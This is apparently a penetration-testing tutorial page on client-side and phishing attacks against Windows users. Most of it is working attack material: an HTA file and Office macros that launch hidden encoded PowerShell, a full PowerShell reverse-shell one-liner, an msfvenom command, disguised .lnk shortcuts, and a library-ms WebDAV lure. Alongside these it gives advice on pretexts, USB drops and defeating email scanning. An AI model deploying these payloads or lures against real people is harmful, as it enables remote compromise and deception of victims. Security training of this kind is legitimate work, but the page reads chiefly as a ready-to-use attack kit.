Client-Side & Phishing Attacks
Client-side attacks target the user rather than the server. Instead of exploiting a network service directly, you deliver a payload that the victim executes — through a malicious document, link, or file.
# Set environment variables
export TARGET=<ip>
export LHOST=<your-ip>
export LPORT=4444
Reconnaissance for Client-Side Attacks
Before crafting a payload, gather information about the target's environment:
Identify the Target's Software
Enumerate the client OS, browser, and installed applications from metadata, HTTP headers, or social engineering. Key things to look for:
- Operating system and version (Windows 10/11, macOS)
- Browser (Chrome, Firefox, Edge)
- Office suite version (Microsoft 365, Office 2019, LibreOffice)
- Email client
- PDF reader
Passive Fingerprinting
Examine metadata from publicly available documents (PDFs, Office files) published by the target organization:
exiftool document.pdf
Metadata often reveals: software versions, usernames, operating system, directory paths, and internal hostnames.
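As an added example (not code from the original page), here is a small Python script that harvests the same fields exiftool shows for the two document types you are most likely to scrape from a target's website: the Info dictionary of a PDF and docProps/core.xml plus docProps/app.xml inside an OOXML file (.docx/.xlsx/.pptx). It then aggregates usernames and software versions across all documents, which is the list you actually want before choosing a payload. The sample PDF and .docx bytes are constructed inline; the PDF parser only handles unencrypted literal strings, which is what Office exports write.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# XML namespaces used by docProps/core.xml and docProps/app.xml inside OOXML files
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}


def pdf_metadata(data: bytes) -> dict:
    """Read literal-string entries from a PDF Info dictionary.

    Handles unencrypted, uncompressed (...) strings only, which is what Office
    and most PDF exporters write; hex strings and object streams need a real
    PDF parser (use exiftool for those).
    """
    meta = {}
    for key in ("Author", "Creator", "Producer", "Title"):
        m = re.search(rb"/" + key.encode() + rb"\s*\(((?:[^()\\]|\\.)*)\)", data)
        if m:
            meta[key] = m.group(1).decode("latin-1")
    return meta


def ooxml_metadata(data: bytes) -> dict:
    """Read author, last editor, application and version from a .docx/.xlsx/.pptx."""
    meta = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            root = ET.fromstring(z.read("docProps/core.xml"))
            for tag, key in (("dc:creator", "Author"), ("cp:lastModifiedBy", "LastModifiedBy")):
                el = root.find(tag, NS)
                if el is not None and el.text:
                    meta[key] = el.text
        if "docProps/app.xml" in names:
            root = ET.fromstring(z.read("docProps/app.xml"))
            for tag in ("Application", "AppVersion", "Company"):
                el = root.find("ep:" + tag, NS)
                if el is not None and el.text:
                    meta[tag] = el.text
    return meta


def extract_metadata(data: bytes) -> dict:
    """Dispatch on the file signature rather than trusting the extension."""
    if data.startswith(b"%PDF"):
        return pdf_metadata(data)
    if data.startswith(b"PK\x03\x04"):
        return ooxml_metadata(data)
    return {}


def summarize(docs: dict) -> dict:
    """Aggregate what matters for a client-side campaign: names and software."""
    users, software = set(), set()
    for meta in docs.values():
        users.update(meta[k] for k in ("Author", "LastModifiedBy") if k in meta)
        if "Application" in meta:
            software.add((meta["Application"] + " " + meta.get("AppVersion", "")).strip())
        software.update(meta[k] for k in ("Creator", "Producer") if k in meta)
    return {"users": sorted(users), "software": sorted(software)}


# Constructed sample inputs (not real documents): a minimal PDF and a minimal .docx
SAMPLE_PDF = (
    b"%PDF-1.7\n1 0 obj\n<< /Author (jsmith) /Creator (Microsoft Word for Microsoft 365)\n"
    b"/Producer (Microsoft Word for Microsoft 365) /Title (Q3 Invoice) >>\nendobj\n"
    b"trailer\n<< /Info 1 0 R >>\n%%EOF\n"
)


def build_sample_docx() -> bytes:
    core = (
        f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
        "<dc:creator>Jane Smith</dc:creator><cp:lastModifiedBy>CORP\\j.smith</cp:lastModifiedBy>"
        "</cp:coreProperties>"
    )
    app = (
        f'<Properties xmlns="{NS["ep"]}"><Application>Microsoft Office Word</Application>'
        "<Company>Example Corp</Company><AppVersion>16.0000</AppVersion></Properties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder; real files carry more parts
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    # Pass real files on the command line; with no arguments the constructed samples are used
    docs = {p: extract_metadata(open(p, "rb").read()) for p in sys.argv[1:]} or {
        "sample.pdf": extract_metadata(SAMPLE_PDF),
        "sample.docx": extract_metadata(build_sample_docx()),
    }
    for name, meta in docs.items():
        print(name, meta)
    print(summarize(docs))
```

Run it over a directory of scraped documents (`python3 harvest.py *.pdf *.docx`); the `LastModifiedBy` field is often a domain-style username (`CORP\j.smith`), which tells you both the naming convention and a name to impersonate in the pretext.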
HTA (HTML Application) Attacks
HTA files are HTML applications that run with the permissions of the user — outside the browser sandbox. They execute via mshta.exe, a trusted Windows binary.
Basic HTA Reverse Shell
Create a file named payload.hta:
<html>
<head>
<script language="VBScript">
Sub RunPayload()
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -nop -w hidden -e <base64-payload>", 0
End Sub
RunPayload
</script>
</head>
<body>
<p>Loading document, please wait...</p>
</body>
</html>
Host and deliver:
python3 -m http.server 80
# Victim visits: http://$LHOST/payload.hta
msfvenom HTA Payload
Generate an HTA file directly:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f hta-psh -o payload.hta
Modern browsers will warn users about HTA downloads. This attack is most effective when delivered via email attachment or through social engineering that convinces the user to "Save and Open" the file.
Microsoft Office Macro Attacks
Office macros (VBA) are a classic client-side attack vector. When the victim opens a document and enables macros, arbitrary code executes.
Basic VBA Reverse Shell Macro
Open Word or Excel, go to View → Macros → Create. Paste this VBA code:
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "powershell -nop -w hidden -e <base64-payload>"
CreateObject("Wscript.Shell").Run str, 0
End Sub
AutoOpen() is Word's legacy auto-macro and Document_Open() is the Document object's open event (it lives in ThisDocument); both fire when the document is opened in Word, and including both makes the macro run whichever mechanism the installed version honours. For an Excel workbook the equivalents are Auto_Open() and Workbook_Open() (the latter goes in ThisWorkbook).
Save the document as .doc (Word 97-2003 format) or .docm (macro-enabled). The .doc format is less suspicious to users and is blocked less often by mail gateways. Note that current Microsoft 365 builds block VBA macros by default in any file that carries the Mark-of-the-Web (downloaded from the internet or saved from an email), whatever its extension, which is why the container formats discussed later on this page matter.
Generating the Base64 Payload
Create the PowerShell reverse shell and encode it:
echo -n '$client = New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -t UTF-16LE | base64 -w 0
Replace LHOST and LPORT with actual values before encoding.
VBA String Length Limitation
VBA limits the length of a single code line (and therefore of a string literal) to roughly 1,000 characters, so a base64 blob of several thousand characters cannot sit in one literal. For long payloads, build the string up across multiple lines:
Sub MyMacro()
Dim str As String
str = "powershell -nop -w hidden -e "
str = str + "JABjAGwAaQBlAG4AdAAgAD0AIABOAG"
str = str + "UAdwAtAE8AYgBqAGUAYwB0ACAAUwB5"
str = str + "AHMAdABlAG0ALgBOAGUAdAAuAFMAbw"
' ... continue splitting
CreateObject("Wscript.Shell").Run str, 0
End Sub
A Python script to auto-split the base64 string into VBA-friendly lines:
import sys

# Usage: python3 split.py "powershell -nop -w hidden -e <base64-payload>"
payload = sys.argv[1]
n = 50  # characters per VBA string literal; well under the per-line limit
chunks = [payload[i:i+n] for i in range(0, len(payload), n)]
for i, chunk in enumerate(chunks):
    if i == 0:
        print(f'    str = "{chunk}"')
    else:
        print(f'    str = str + "{chunk}"')
OLE Object Embedding
Embed executable files inside Office documents as OLE package objects. When the victim double-clicks the embedded object, Office extracts it and runs it.
Embedding a Batch File in Word
- Create a batch file (payload.bat) that downloads and runs your reverse shell
- In Word: Insert → Object → Create from File → select payload.bat
- Check "Display as icon" and change the icon to something believable (e.g., a PDF icon)
- Save and deliver the document
The victim sees what looks like an embedded PDF; double-clicking it runs the batch file. Expect Office to show a confirmation dialog before the package runs, and note that recent Office versions may refuse to activate packaged executables outright depending on policy, so test against the target's Office build.
Windows Library Files (.library-ms)
Library files are XML that defines a virtual folder aggregating content from several locations, and a location may be a WebDAV URL. When the victim opens the library file, Explorer connects to that URL and shows its contents as if they were a local folder, so a malicious shortcut hosted on your WebDAV server appears one click away.
Setup WebDAV Server
pip install wsgidav cheroot --break-system-packages   # cheroot is the WSGI server wsgidav runs on
mkdir /home/kali/webdav
# Place a malicious .lnk shortcut in the directory
wsgidav --host=0.0.0.0 --port=80 --root /home/kali/webdav --auth=anonymous
Create Library File
Create Documents.library-ms:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://LHOST</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
Replace LHOST with your WebDAV server IP.
Create Malicious Shortcut (.lnk)
On a Windows machine, create a shortcut with this target:
powershell.exe -nop -w hidden -e <base64-payload>
Change the shortcut icon to something inconspicuous (a folder icon, document icon, etc.). Place it in the WebDAV directory.
When the victim opens the .library-ms file, Windows mounts the WebDAV share and displays the shortcut. Clicking it runs the payload.
Pretexting and Delivery
The technical payload is only half the attack. Delivery and social engineering determine whether the victim actually opens it.
Effective Pretexts
- Invoice or purchase order requiring review
- Shared document from a colleague (especially after recon identifies real names)
- IT department requesting action (password reset, software update)
- Resume submission (for HR departments)
- Legal document requiring signature
Delivery Methods
Email attachment — most common; effectiveness depends on email security controls (SPF, DKIM, DMARC, attachment scanning).
Link to hosted payload — host the file on a plausible-looking domain and link to it in the email. Less likely to be caught by attachment scanners.
USB drop — place USB drives in parking lots or common areas. Preload with autorun payloads or enticing filenames. Works well in physical engagements.
Bypassing Email Security
- Use .doc instead of .docm (less commonly blocked)
- Password-protect the document and include the password in the email body (prevents automated scanning)
- Use cloud storage links (OneDrive, Google Drive, Dropbox) instead of direct attachments
- ZIP the payload with a password
If macro-enabled documents are blocked by the target's email gateway, consider alternative payload formats: .hta, .url, .lnk, .iso (mounts as a drive on Windows 8 and later), or .vhd files. Each has different detection rates.
Payload Delivery via File Formats
Windows Shortcut Files (.lnk)
Create a shortcut that executes PowerShell when clicked:
Target: powershell.exe -nop -w hidden -e <base64-payload>
Start in: C:\Windows\System32
Icon: Change to a PDF or folder icon
ISO/IMG Files
ISO files mount as a virtual drive when double-clicked on Windows 8 and later. Historically the Mark-of-the-Web (the Zone.Identifier alternate data stream written to downloaded files) stayed on the ISO itself and was not carried over to the files inside it, so a document opened from the mounted image skipped Protected View and the default block on macros in internet-sourced files.
Create an ISO containing your malicious document:
mkisofs -o payload.iso -J -R /path/to/malicious/files/
Since the Windows security updates of late 2022, MOTW is propagated to files inside mounted ISO images, so this bypass no longer works on a fully patched system. Always test against the target's patch level.